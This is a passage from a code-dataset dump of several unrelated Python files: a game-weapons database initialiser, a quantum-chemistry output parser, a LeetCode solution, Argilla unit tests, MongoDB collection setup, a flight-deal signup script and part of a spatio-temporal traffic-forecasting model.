rows[0][\"COUNT(*)\"]\n\n # If the number of weapons obtained from the API is larger than the number of rows in the table\n # (number of rows = number of weapons), delete the table and re-update. \n # The len(weapons) can only be larger if new weapons were recently added to the API. \n if num_rows < len(weapons):\n db.execute(\"DELETE FROM bfv_weapons\")\n\n folder = './app/static/images/bfvImages'\n delete_files_in_folder(folder)\n\n random.shuffle(weapons)\n for i in range(len(weapons)):\n encrypted_filename = download_image_encrypt_filename(weapons[i][\"image\"], folder)\n db.execute(\"INSERT INTO bfv_weapons (weapon_name, weapon_type, weapon_image, encrypted_image_name) VALUES(?, ?, ?, ?)\",\n weapons[i][\"weaponName\"], weapons[i][\"type\"], weapons[i][\"image\"], encrypted_filename)\n\n\n# Select a folder directory to delete all the contents within it. \ndef delete_files_in_folder(folder):\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n os.rmdir(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\n# Download the image from the URL and save it under the selected directory as an encrypted filename\n# Return the encrypted filename to potentially pass onto a variable. \ndef download_image_encrypt_filename(url, folder):\n response = requests.get(url)\n\n if response.status_code == 200:\n # Copies the string within the URL after the last \"/\"\n # e.g. for this URL: https://eaassets-a.akamaihd.net/battlelog/battlebinary/gamedata/Casablanca/12/71/MG34-f447ad5e.png\n # the filename would be \"MG34-f447ad5e.png\"\n filename = url.split(\"/\")[-1]\n hash = hashlib.sha256(filename.encode()).hexdigest()\n encrypted_filename = hash + \".png\"\n\n save_path = os.path.join(folder, encrypted_filename)\n\n with open(save_path, \"wb\") as f:\n f.write(response.content)\n \n return encrypted_filename\n","repo_name":"haminkim1/BF-GTW","sub_path":"app/db/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71303953812","text":"#!/usr/bin/env python3\n\"\"\"\nScript for parsing libwfa output.\n\"\"\"\nfrom __future__ import print_function, division\nimport sys\n\nfrom .actions import Action\nfrom colt.lazyimport import LazyImportCreator, LazyImporter\n\n\nwith LazyImportCreator() as importer:\n theo_header = importer.lazy_import_as('..theo_header', 'theo_header')\n dens_ana_base = importer.lazy_import_as('..dens_ana_base', 'dens_ana_base')\n error_handler = importer.lazy_import_as('..error_handler', 'error_handler')\n input_options = importer.lazy_import_as('..input_options', 'input_options')\n\nclass ParseLibwfa(Action): \n\n name = 'parse_libwfa'\n\n _colt_description = 'Parse libwfa output from Q-Chem or OpenMolcas'\n\n _user_input = \"\"\"\n # Logfile from Q-Chem or OpenMolcas\n logfile = :: existing_file\n # Type of calculation (qcadc, qctddft, qctda, rassi)\n typ = :: str :: qcadc, qctddft, qctda, rassi\n # Input file\n ifile = :: file, optional, alias=f\n \"\"\"\n\n _lazy_imports = LazyImporter({\n '..theo_header': 'theo_header',\n '..dens_ana_base': 'dens_ana_base',\n '..error_handler': 'error_handler',\n '..input_options': 'input_options',\n })\n\n def run(logfile, typ, ifile):\n #--------------------------------------------------------------------------#\n # Input options\n #--------------------------------------------------------------------------#\n \n ioptions = input_options.libwfa_parse_options(ifile, check_init=False)\n \n ioptions['rfile'] = logfile\n if typ is not None:\n ioptions['rtype'] = typ\n \n if ioptions['rtype'] == 'qctda':\n ioptions['TDA'] = True\n ioptions['rtype'] = 'qctddft'\n\n theo_header.print_header(__class__._colt_description, ioptions=ioptions)\n \n #--------------------------------------------------------------------------#\n # Parsing and computations\n #--------------------------------------------------------------------------#\n \n dena = dens_ana_base.dens_ana_base(ioptions)\n #sdena.read_mos()\n \n dena.read_dens()\n \n dena.print_summary()\n","repo_name":"felixplasser/theodore-qc","sub_path":"theodore/actions/parse_libwfa.py","file_name":"parse_libwfa.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"39546633112","text":"\ndef longestConsecutive(nums):\n numsSet=set(nums) \n print(numsSet)\n longestSeq=0\n \n for num in numsSet:\n \n if (num-1) not in numsSet:\n seqLength=1\n \n while (num+seqLength) in numsSet:\n seqLength+=1\n \n longestSeq=max(seqLength,longestSeq)\n \n return longestSeq\n \n \n# nums = [100,4,200,1,3,2]\nnums = [0,3,7,2,5,8,4,6,0,1]\nres=longestConsecutive(nums)\nprint(res)","repo_name":"engrkashem/problem_solving_solutions","sub_path":"Leetcode/longest_consequtive_sequence_128.py","file_name":"longest_consequtive_sequence_128.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9654088951","text":"import pytest\nfrom argilla._constants import DEFAULT_MAX_KEYWORD_LENGTH\nfrom argilla.server.apis.v0.models.text_classification import (\n TextClassificationAnnotation,\n TextClassificationQuery,\n TextClassificationRecord,\n)\nfrom argilla.server.commons.models import PredictionStatus, TaskStatus\nfrom argilla.server.daos.backend.search.query_builder import EsQueryBuilder\nfrom argilla.server.services.tasks.text_classification.model import (\n ClassPrediction,\n ServiceTextClassificationRecord,\n)\nfrom pydantic import ValidationError\n\n\ndef test_flatten_metadata():\n data = {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\"mail\": {\"subject\": \"The mail subject\", \"body\": \"This is a large text body\"}},\n }\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert list(record.metadata.keys()) == [\"mail.subject\", \"mail.body\"]\n\n\ndef test_metadata_with_object_list():\n data = {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\n \"mails\": [\n {\"subject\": \"Mail One\", \"body\": \"This is a large text body\"},\n {\"subject\": \"Mail Two\", \"body\": \"This is a large text body\"},\n ]\n },\n }\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert list(record.metadata.keys()) == [\"mails\"]\n\n\ndef test_model_dict():\n record = TextClassificationRecord.parse_obj(\n {\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"A\"}, {\"class\": \"B\"}],\n },\n \"multi_label\": True,\n }\n )\n\n assert record.dict(exclude_none=True) == {\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ],\n },\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"metrics\": {},\n \"multi_label\": True,\n \"status\": \"Default\",\n }\n\n\ndef test_model_with_annotations():\n record = TextClassificationRecord.parse_obj(\n {\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"multi_label\": True,\n \"status\": \"Default\",\n }\n )\n\n assert record.dict(exclude_none=True) == {\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ],\n },\n \"annotations\": {\n \"test\": {\n \"labels\": [\n {\"class_label\": \"A\", \"score\": 1.0},\n {\"class_label\": \"B\", \"score\": 1.0},\n ]\n }\n },\n \"id\": 1,\n \"inputs\": {\"text\": \"This is a text\"},\n \"metrics\": {},\n \"multi_label\": True,\n \"status\": \"Default\",\n }\n\n\ndef test_single_label_with_multiple_annotation():\n with pytest.raises(\n ValidationError,\n match=\"Single label record must include only one annotation label\",\n ):\n ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"This is a text\"},\n \"annotation\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"A\"}, {\"class\": \"B\"}],\n },\n \"multi_label\": False,\n }\n )\n\n\ndef test_too_long_metadata():\n record = ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"bogh\"},\n \"metadata\": {\"too_long\": \"a\" * 1000},\n }\n )\n\n assert len(record.metadata[\"too_long\"]) == DEFAULT_MAX_KEYWORD_LENGTH\n\n\ndef test_too_long_label():\n with pytest.raises(ValidationError, match=\"exceeds max length\"):\n ServiceTextClassificationRecord.parse_obj(\n {\n \"inputs\": {\"text\": \"bogh\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [{\"class\": \"a\" * 1000}],\n },\n }\n )\n\n\ndef test_score_integrity():\n data = {\n \"multi_label\": False,\n \"inputs\": {\"data\": \"My cool data\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.3},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n }\n\n try:\n ServiceTextClassificationRecord.parse_obj(data)\n except ValidationError as e:\n assert \"Wrong score distributions\" in e.json()\n\n data[\"multi_label\"] = True\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n data[\"multi_label\"] = False\n data[\"prediction\"][\"labels\"] = [\n {\"class\": \"B\", \"score\": 0.9},\n ]\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n data[\"prediction\"][\"labels\"] = [\n {\"class\": \"B\", \"score\": 0.10000000012},\n {\"class\": \"B\", \"score\": 0.90000000002},\n ]\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record is not None\n\n\ndef test_prediction_ok_cases():\n data = {\n \"multi_label\": True,\n \"inputs\": {\"data\": \"My cool data\"},\n \"prediction\": {\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.3},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n }\n\n record = ServiceTextClassificationRecord(**data)\n assert record.predicted is None\n record.annotation = TextClassificationAnnotation(\n **{\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 1},\n {\"class\": \"B\", \"score\": 1},\n ],\n },\n )\n assert record.predicted == PredictionStatus.KO\n\n record.prediction = TextClassificationAnnotation(\n **{\n \"agent\": \"test\",\n \"labels\": [\n {\"class\": \"A\", \"score\": 0.9},\n {\"class\": \"B\", \"score\": 0.9},\n ],\n },\n )\n assert record.predicted == PredictionStatus.OK\n\n record.prediction = None\n assert record.predicted is None\n\n\ndef test_score_ranges():\n with pytest.raises(ValidationError, match=\"less than or equal to 1.0\"):\n ClassPrediction(class_label=\"BB\", score=100)\n\n with pytest.raises(ValidationError, match=\"greater than or equal to 0.0\"):\n ClassPrediction(class_label=\"BB\", score=-100)\n\n\ndef test_predicted_as_with_no_labels():\n data = {\n \"inputs\": {\"text\": \"The input text\"},\n \"prediction\": {\"agent\": \"test\", \"labels\": []},\n }\n record = ServiceTextClassificationRecord(**data)\n assert record.predicted_as == []\n\n\ndef test_created_record_with_default_status():\n data = {\n \"inputs\": {\"data\": \"My cool data\"},\n }\n\n record = ServiceTextClassificationRecord.parse_obj(data)\n assert record.status == TaskStatus.default\n\n\ndef test_predicted_ok_for_multilabel_unordered():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The text\"},\n prediction=TextClassificationAnnotation(\n agent=\"test\",\n labels=[\n ClassPrediction(class_label=\"B\"),\n ClassPrediction(class_label=\"C\", score=0.3),\n ClassPrediction(class_label=\"A\"),\n ],\n ),\n annotation=TextClassificationAnnotation(\n agent=\"test\",\n labels=[ClassPrediction(class_label=\"A\"), ClassPrediction(class_label=\"B\")],\n ),\n multi_label=True,\n )\n\n assert record.predicted == PredictionStatus.OK\n\n\n@pytest.mark.parametrize(\n \"annotation\",\n [\n TextClassificationAnnotation(\n agent=\"test_ok\",\n labels=[],\n ),\n None,\n ],\n)\ndef test_validate_without_labels_for_single_label(annotation):\n with pytest.raises(\n ValidationError,\n match=\"Annotation must include some label for validated records\",\n ):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"The text\"},\n status=TaskStatus.validated,\n prediction=TextClassificationAnnotation(\n agent=\"test\",\n labels=[\n ClassPrediction(class_label=\"C\", score=0.3),\n ],\n ),\n annotation=annotation,\n )\n\n\ndef test_query_with_uncovered_by_rules():\n query = TextClassificationQuery(uncovered_by_rules=[\"query\", \"other*\"])\n\n assert EsQueryBuilder._to_es_query(query) == {\n \"bool\": {\n \"must\": {\"match_all\": {}},\n \"must_not\": {\n \"bool\": {\n \"minimum_should_match\": 1,\n \"should\": [\n {\n \"bool\": {\n \"must\": {\n \"query_string\": {\n \"default_field\": \"text\",\n \"default_operator\": \"AND\",\n \"query\": \"query\",\n }\n }\n }\n },\n {\n \"bool\": {\n \"must\": {\n \"query_string\": {\n \"default_field\": \"text\",\n \"default_operator\": \"AND\",\n \"query\": \"other*\",\n }\n }\n }\n },\n ],\n }\n },\n }\n }\n\n\ndef test_empty_labels_for_no_multilabel():\n with pytest.raises(\n ValidationError,\n match=\"Single label record must include only one annotation label\",\n ):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n )\n\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n prediction=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[ClassPrediction(class_label=\"B\")]),\n )\n assert record.predicted == PredictionStatus.KO\n\n\ndef test_annotated_without_labels_for_multilabel():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"The input text\"},\n multi_label=True,\n prediction=TextClassificationAnnotation(agent=\"pred.\", labels=[]),\n annotation=TextClassificationAnnotation(agent=\"ann.\", labels=[]),\n )\n\n assert record.predicted == PredictionStatus.OK\n\n\ndef test_using_predictions_dict():\n record = ServiceTextClassificationRecord(\n inputs={\"text\": \"this is a text\"},\n predictions={\n \"carl\": TextClassificationAnnotation(agent=\"wat at\", labels=[ClassPrediction(class_label=\"YES\")]),\n \"BOB\": TextClassificationAnnotation(agent=\"wot wot\", labels=[ClassPrediction(class_label=\"NO\")]),\n },\n )\n\n assert record.prediction.dict() == {\n \"agent\": \"carl\",\n \"labels\": [{\"class_label\": \"YES\", \"score\": 1.0}],\n }\n assert record.predictions == {\n \"BOB\": TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"NO\")]),\n \"carl\": TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"YES\")]),\n }\n\n\ndef test_with_no_agent_at_all():\n with pytest.raises(ValidationError):\n ServiceTextClassificationRecord(\n inputs={\"text\": \"this is a text\"},\n prediction=TextClassificationAnnotation(labels=[ClassPrediction(class_label=\"YES\")]),\n )\n","repo_name":"argilla-io/argilla","sub_path":"tests/unit/server/models/old_models/test_text_classification.py","file_name":"test_text_classification.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"66"} +{"seq_id":"41080979592","text":"from pymongo import MongoClient\nfrom settings import (\n MONGO_DB,\n MONGO_COLLECTION,\n ENTITY_COLLECTION,\n ANNOY_INDEX_COLLECTION,\n QUOTE_COLLECTION,\n MONGO_COLLECTION_ENRICHED,\n SIMILAR_ENTITIES_COLLECTION,\n ENTITY_KEYWORDS_COLLECTION\n )\n\nclient = MongoClient()\n\ndb = client[MONGO_DB]\n\narticle_collection = db[MONGO_COLLECTION]\nentity_collection = db[ENTITY_COLLECTION]\nannoy_index_collection = db[ANNOY_INDEX_COLLECTION]\nquote_collection = db[QUOTE_COLLECTION]\nenriched_collection = db[MONGO_COLLECTION_ENRICHED]\nsimilar_entities_collection = db[SIMILAR_ENTITIES_COLLECTION]\nentity_keywords_collection = db[ENTITY_KEYWORDS_COLLECTION]\n","repo_name":"petakajaib/dia-kata","sub_path":"mongo_collections/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34203265675","text":"import sheety\n\nfirst_name = input(\n \"Welcome to Ryan's Flight Club.\\nWe find the best flight deals and email you.\\nWhat is your first name? \")\nlast_name = input(\"And what is your last name, please? \")\n\nemail = \"email\"\nemail_confirmation = \"email_confirmation\"\n\nwhile email != email_confirmation:\n email = input(\"Finally, what is your email? \")\n if email.lower() == \"quit\" \\\n or email.lower() == \"exit\":\n exit()\n email_confirmation = input(\"Please type your email a second time for confirmation: \")\n if email_confirmation.lower() == \"quit\" \\\n or email.lower() == \"exit\":\n exit()\n\nprint(\"Brilliant! You made the cut. You're in the Flight Club!\")\n\nsheety.post_new_row(first_name, last_name, email)\n\n\"\"\"MY FIRST ATTEMPT -> WHICH DID WORK . . . MOSTLY ;)\"\"\"\n# import requests\n\n# # Sheety API constant\n# SHEETY_USERS_ENDPOINT = \"https://api.sheety.co/b456eca6f5cc1f2313ff597eca22ef30/flightDeals/users\"\n\n# first_name = input(\"Welcome to Ryan's Flight Club.\\nWe find the best flight deals and email you.\\nWhat is your first name? \")\n# last_name = input(\"And what is your last name, please? \")\n\n# email = \"\"\n# email_confirmation = \"\"\n\n# def get_email():\n# email = input(\"Finally, what is your email? \")\n# email_confirmation = input(\"Please type your email a second time for confirmation: \")\n# return email, email_confirmation\n\n# get_email()\n# email_confirmed = False\n# while email_confirmed:\n# if email == email_confirmation:\n# print(\"Brilliant! You made the cut. You're in the Flight Club!\")\n# email_confirmed = True\n# else:\n# get_email()\n\n\n# new_data = {\n# \"user\": {\n# \"firstName\": first_name,\n# \"lastName\": last_name,\n# \"email\": email\n# }\n# }\n# response = requests.post(\n# url=SHEETY_USERS_ENDPOINT,\n# json=new_data\n# )\n# data = response.json()\n# print(data[\"user\"])\n","repo_name":"RyanLBuchanan/AngelaYu_AppBrewery","sub_path":"Assignments/Intermediate_Modules/Day_40/flight_club/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25380202392","text":"import math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom functools import partial\nfrom logging import getLogger\nfrom libcity.model import loss\nfrom libcity.model.abstract_traffic_state_model import AbstractTrafficStateModel\nimport time\n\n\ndef drop_path(x, drop_prob=0., training=False):\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1)\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_()\n output = x.div(keep_prob) * random_tensor\n return output\n\ndef cal_laplacian(adj):\n adj += np.eye(adj.shape[0])\n degree = np.array(adj.sum(1))\n degree = np.diag(np.power(degree, -0.5))\n return degree.dot(adj).dot(degree)\n\nclass ChebGraphConvForBatch(nn.Module):\n def __init__(self, c_in, c_out, Ks, bias):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.Ks = Ks\n self.weight = nn.Parameter(torch.FloatTensor(Ks, c_in, c_out))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(c_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x, dnGso):\n x = torch.permute(x, (0, 2, 3, 1))\n\n if self.Ks - 1 < 0:\n raise ValueError(\n f'ERROR: the graph convolution kernel size Ks has to be a positive integer, but received {self.Ks}.')\n elif self.Ks - 1 == 0:\n x_0 = x\n x_list = [x_0]\n elif self.Ks - 1 == 1:\n x_0 = x\n x_1 = torch.einsum('bhi,btij->bthj', dnGso, x)\n x_list = [x_0, x_1]\n elif self.Ks - 1 >= 2:\n x_0 = x\n x_1 = torch.einsum('bhi,btij->bthj', dnGso, x)\n x_list = [x_0, x_1]\n for k in range(2, self.Ks):\n x_list.append(torch.einsum('bhi,btij->bthj', 2 * dnGso, x_list[k - 1]) - x_list[k - 2])\n\n x = torch.stack(x_list, dim=2)\n\n cheb_graph_conv = torch.einsum('btkhi,kij->bthj', x, self.weight)\n\n if self.bias is not None:\n cheb_graph_conv = torch.add(cheb_graph_conv, self.bias)\n else:\n cheb_graph_conv = cheb_graph_conv\n\n return cheb_graph_conv\n\nclass ChebGraphConv(nn.Module):\n def __init__(self, c_in, c_out, Ks, gso, bias):\n super().__init__()\n self.c_in = c_in\n self.c_out = c_out\n self.Ks = Ks\n self.gso = gso\n self.weight = nn.Parameter(torch.FloatTensor(Ks, c_in, c_out))\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(c_out))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n x = torch.permute(x, (0, 2, 3, 1))\n\n if self.Ks - 1 < 0:\n raise ValueError(\n f'ERROR: the graph convolution kernel size Ks has to be a positive integer, but received {self.Ks}.')\n elif self.Ks - 1 == 0:\n x_0 = x\n x_list = [x_0]\n elif self.Ks - 1 == 1:\n x_0 = x\n x_1 = torch.einsum('hi,btij->bthj', self.gso, x)\n x_list = [x_0, x_1]\n elif self.Ks - 1 >= 2:\n x_0 = x\n x_1 = torch.einsum('hi,btij->bthj', self.gso, x)\n x_list = [x_0, x_1]\n for k in range(2, self.Ks):\n x_list.append(torch.einsum('hi,btij->bthj', 2 * self.gso, x_list[k - 1]) - x_list[k - 2])\n\n x = torch.stack(x_list, dim=2)\n\n cheb_graph_conv = torch.einsum('btkhi,kij->bthj', x, self.weight)\n\n if self.bias is not None:\n cheb_graph_conv = torch.add(cheb_graph_conv, self.bias)\n else:\n cheb_graph_conv = cheb_graph_conv\n\n return cheb_graph_conv\n\nclass TokenEmbedding(nn.Module):\n def __init__(self, input_dim, embed_dim, norm_layer=None):\n super().__init__()\n self.token_embed = nn.Linear(input_dim, embed_dim, bias=True)\n self.norm = norm_layer(embed_dim) if norm_layer is not None else nn.Identity()\n\n def forward(self, x):\n x = self.token_embed(x)\n x = self.norm(x)\n return x\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, embed_dim, max_len=100):\n super(PositionalEncoding, self).__init__()\n pe = torch.zeros(max_len, embed_dim).float()\n pe.require_grad = False\n\n position = torch.arange(0, max_len).float().unsqueeze(1)\n div_term = (torch.arange(0, embed_dim, 2).float() * -(math.log(10000.0) / embed_dim)).exp()\n\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n return self.pe[:, :x.size(1)].unsqueeze(2).expand_as(x).detach()\n\n\nclass LaplacianPE(nn.Module):\n def __init__(self, lape_dim, embed_dim):\n super().__init__()\n self.embedding_lap_pos_enc = nn.Linear(lape_dim, embed_dim)\n\n def forward(self, lap_mx):\n lap_pos_enc = self.embedding_lap_pos_enc(lap_mx).unsqueeze(0).unsqueeze(0)\n return lap_pos_enc\n\n\nclass DataEmbedding(nn.Module):\n def __init__(\n self, feature_dim, embed_dim, lape_dim, adj_mx, drop=0.,\n add_time_in_day=False, add_day_in_week=False, device=torch.device('cuda'),\n ):\n super().__init__()\n\n self.add_time_in_day = add_time_in_day\n self.add_day_in_week = add_day_in_week\n\n self.device = device\n self.embed_dim = embed_dim\n self.feature_dim = feature_dim\n self.value_embedding = TokenEmbedding(feature_dim, embed_dim)\n\n self.position_encoding = PositionalEncoding(embed_dim)\n if self.add_time_in_day:\n self.minute_size = 1440\n self.daytime_embedding = nn.Embedding(self.minute_size, embed_dim)\n if self.add_day_in_week:\n weekday_size = 7\n self.weekday_embedding = nn.Embedding(weekday_size, embed_dim)\n self.spatial_embedding = LaplacianPE(lape_dim, embed_dim)\n self.dropout = nn.Dropout(drop)\n\n def forward(self, x, lap_mx):\n origin_x = x\n x = self.value_embedding(origin_x[:, :, :, :self.feature_dim])\n x += self.position_encoding(x)\n if self.add_time_in_day:\n x += self.daytime_embedding((origin_x[:, :, :, self.feature_dim] * self.minute_size).round().long())\n if self.add_day_in_week:\n x += self.weekday_embedding(origin_x[:, :, :, self.feature_dim + 1: self.feature_dim + 8].argmax(dim=3))\n x += self.spatial_embedding(lap_mx)\n x = self.dropout(x)\n return x\n\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass Chomp2d(nn.Module):\n def __init__(self, chomp_size):\n super(Chomp2d, self).__init__()\n self.chomp_size = chomp_size\n\n def forward(self, x):\n return x[:, :, :x.shape[2] - self.chomp_size, :].contiguous()\n\nclass LUpdator(nn.Module):\n def __init__(self, T, N, k_spatial=60, k_temporal=12):\n super().__init__()\n self.T = T\n self.N = N\n\n u_spatial = torch.randn((N, k_spatial), requires_grad=True)\n self.u_spatial = torch.nn.Parameter(u_spatial)\n self.register_parameter(\"u_spatial\", self.u_spatial)\n\n u_temporal = torch.randn((T, k_temporal), requires_grad=True)\n self.u_temporal = torch.nn.Parameter(u_temporal)\n self.register_parameter(\"u_temporal\", self.u_temporal)\n\n self.conv2d_1 = torch.nn.Conv2d(3, 1, kernel_size=(1, 1))\n self.norm = nn.LayerNorm(normalized_shape=[N, N])\n self.relu = nn.ReLU()\n\n def forward(self, x, spatialL, geo_mask):\n B, T, N, D = x.shape\n x = x.permute(0, 2, 1, 3)\n u_spatial = torch.einsum(\"ik,kj->ij\", [self.u_spatial, torch.transpose(self.u_spatial, 0, 1)])\n u_temporal = torch.einsum(\"ik,kj->ij\", [self.u_temporal, torch.transpose(self.u_temporal, 0, 1)])\n sn_lowrank = torch.einsum(\"bitk,ij->bjtk\", [x, u_spatial])\n sn_lowrank = torch.einsum(\"bitk,tj->bijk\", [sn_lowrank, u_temporal])\n sn_exception = x - sn_lowrank\n\n sn_lowrank = sn_lowrank.reshape(B, N, T * D)\n sn_exception = sn_exception.reshape(B, N, T * D)\n sn_lowrank = sn_lowrank - torch.mean(sn_lowrank, dim=2, keepdim=True)\n sn_exception = sn_exception - torch.mean(sn_exception, dim=2, keepdim=True)\n\n x_ee = torch.einsum(\"bik,bkj->bij\", [sn_exception, torch.transpose(sn_exception, 1, 2)])\n x_ee = self.norm(x_ee)\n x_le = torch.einsum(\"bik,bkj->bij\", [sn_lowrank, torch.transpose(sn_exception, 1, 2)])\n x_le = self.norm(x_le)\n x_el = torch.einsum(\"bik,bkj->bij\", [sn_exception, torch.transpose(sn_lowrank, 1, 2)])\n x_el = self.norm(x_el)\n\n covList = []\n covList.append(x_ee)\n covList.append(x_le)\n covList.append(x_el)\n covTensor = torch.stack(covList, dim=-1).permute(0, 3, 1, 2)\n B_conv = self.conv2d_1(covTensor)\n B_conv = self.relu(B_conv)\n\n B_conv = B_conv.reshape(B, N, N)\n\n BQ = torch.einsum(\"bik,bkj->bij\", [B_conv, spatialL])\n taylorTerm = 3\n forIterm = -torch.einsum(\"bik,bkj->bij\", [spatialL, BQ])\n spatialL_update = forIterm.clone()\n for i in range(taylorTerm):\n forIterm = -torch.einsum(\"bik,bkj->bij\", [forIterm, BQ])\n spatialL_update = spatialL_update + forIterm\n\n spatialL = spatialL + spatialL_update\n spatialL.masked_fill_(geo_mask, 0)\n\n spatialL = torch.clamp(spatialL, -1, 0)\n spatialL_degree = torch.abs(torch.sum(spatialL, dim=2, keepdims=True))\n spatialL = torch.eye(int(N), device=torch.device(\"cuda\")) + spatialL / torch.clamp(spatialL_degree, 0.00000001, 10000000)\n return spatialL\n\nclass DSTFormer(nn.Module):\n def __init__(self, c_in, c_out, qkv_bias=False, attn_drop=0., proj_drop=0., device=torch.device('cuda')):\n super().__init__()\n self.sem_q_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_k_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_v_conv = nn.Conv2d(c_in, c_out, kernel_size=1, bias=qkv_bias)\n self.sem_attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(c_in, c_in)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def assemblingMask(self, geo_mask):\n N = geo_mask.shape[0]\n true_mask = torch.ones([N, N], device=torch.device(\"cuda\"))\n uneye_mask = torch.ones([N, N], device=torch.device(\"cuda\")) - torch.eye(int(N), device=torch.device(\"cuda\"))\n true_mask = true_mask.bool()\n uneye_mask = uneye_mask.bool()\n\n L_row1 = torch.concat([geo_mask, uneye_mask, true_mask], 0)\n L_row2 = torch.concat([uneye_mask, geo_mask, uneye_mask], 0)\n L_row3 = torch.concat([true_mask, uneye_mask, geo_mask], 0)\n return torch.concat([L_row1, L_row2, L_row3], 1)\n\n def forward(self, x, geo_mask=None, sem_mask=None):\n B, T, N, D = x.shape\n x = torch.concat([x[:, 0, :, :].reshape(B,1,N,D), x, x[:, T-1, :, :].reshape(B,1,N,D)], 1)\n\n stX = x.unfold(1,3,1)\n stX = stX.permute(0, 3, 1, 4, 2)\n stX = stX.reshape(stX.shape[0], stX.shape[1], stX.shape[2], stX.shape[3]*stX.shape[4])\n\n sem_q = self.sem_q_conv(stX).permute(0, 2, 